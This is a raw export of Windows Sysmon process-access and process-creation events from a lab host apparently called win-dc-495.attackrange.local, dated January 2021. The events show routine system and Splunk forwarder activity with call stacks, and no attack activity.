14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:38.266{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000019090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:38.266{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000019099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.394{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.393{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
